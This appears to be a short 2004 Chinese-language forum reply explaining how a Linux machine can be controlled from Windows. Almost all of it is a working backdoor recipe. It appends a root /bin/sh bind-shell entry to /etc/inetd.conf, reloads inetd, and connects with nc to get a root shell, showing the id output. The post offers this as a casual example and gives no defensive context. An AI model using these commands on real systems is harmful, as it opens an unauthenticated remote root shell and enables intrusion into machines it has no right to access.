|
发表于 2004-6-5 00:21:01
|
显示全部楼层
最初由 Beta 发表
我还是想问问你的 linux 系统是怎么被他用 windows 搞的?数据包攻击?windows 怎么入侵 linux?他在他的windows上装了cywin?
Linux
#echo "exec stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf
#killall -HUP inetd
M$下:
cmd>nc 192.168.1.1 512
bash# id
id
uid=0(root) gid=0(root) groups=0(root)
bash#
以上的只一个例子而已:-) |
|